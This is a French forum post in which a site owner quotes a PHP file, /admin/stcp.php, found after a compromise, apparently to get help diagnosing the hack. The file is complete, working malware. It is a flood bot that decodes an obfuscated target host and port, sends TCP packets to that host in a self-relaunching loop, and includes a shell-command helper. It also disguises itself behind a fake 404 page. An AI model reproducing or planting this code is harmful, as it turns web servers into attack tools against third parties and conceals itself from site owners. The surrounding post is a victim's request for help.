[geantick]

Voici le contenu du fichier déclaré comme étant la cause du problème lors du premier "piratage":

/admin/stcp.php

Code :

[== PHP ==]
<?php
@ignore_user_abort(TRUE);
@set_time_limit(0);
@ini_set("display_errors","off");
@error_reporting(0);
function cmdexec($cmd)
{
    if(function_exists('exec'))@exec($cmd);
    elseif(function_exists('passthru'))@passthru($cmd);
    elseif(function_exists('shell_exec'))@shell_exec($cmd);
    elseif(function_exists('system'))@system($cmd);
    elseif(function_exists('popen'))@popen($cmd,"r");
}

if ($_REQUEST['action'] == "status")
{
    die("itsoknoproblembro");
}
    $packets = 0;
    
Function decodesttr($string)
{
    $string = @str_rot13($string);
    $start_str = @substr($string,2);
    $end_str = @substr($string,0,2);
    return @base64_decode($start_str.$end_str);
}
function curPageURL()
{
     $pageURL = 'http';
     if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
     $pageURL .= "://";
     if ($_SERVER["SERVER_PORT"] != "80")
     {
          $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
     }
     else
     {
          $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
     }
     return $pageURL;
}    
if ($_REQUEST['action'] == 'start')
{
    $action1=$_REQUEST['page'];
    $action = decodesttr($_REQUEST['page']);
    @list ($host,$port,$size,$exec_time) = explode("[#]",$action);
    //cmdexec("ping -f $host");
    if(isset($_REQUEST['time_s']))
    {
        $time = $_REQUEST['time_s'];
        $max_time = $_REQUEST['time_e'];
    }
    else
    {
        $time = time();
        $max_time = $time+$exec_time;
    }
    function pack_str($str, $len)
    {      
        $out_str = "";
        for($i=0; $i<$len; $i++)
        {
            $out_str .= pack("a$len", ord(substr($str, $i, 1)));
        }
        return $out_str;
    }    
    $out = str_repeat("A", $size);
    $step_time=time()+60;
    $release_time=time()+1;
    $first1=0;
    while(time() < $max_time)
    {
        if(time() > $release_time && $first1==0)
        {
            $first1=1;
            $address_host="http://".$_SERVER['HTTP_HOST']."/".$_SERVER['PHP_SELF'];
            $ch =@curl_init();
            @curl_setopt($ch,CURLOPT_URL,$address_host."?action=start&time_s=$time&time_e=$max_time&page=$action1");
            @curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);
            @curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,2);
            @curl_setopt($ch,CURLOPT_HEADER,0);
            @curl_setopt($ch,CURLOPT_RETURNTRANSFER,0);
            @curl_setopt($ch,CURLOPT_TIMEOUT,10);
            @curl_exec($ch);
        }
        if(time() > $step_time)
        {
            @exit();
            @die();
        }
        @stream_set_timeout($socket,0,1);        
        $socket = @stream_socket_client("tcp://$host:$port",$err,$err2,1,STREAM_CLIENT_ASYNC_CONNECT);
        if ($socket)
        {
            @stream_socket_sendto($socket,$out);
        }
        @fclose($socket);
    }
    $base = dirname(__FILE__)."/";
    //unlink($base."stcp.php");
    //cmdexec("killall ping");
    die();
}

if($_REQUEST['action']==NULL)
{
    print "<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /stph.php was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>";
}
?>

Voici la liste des modules présents: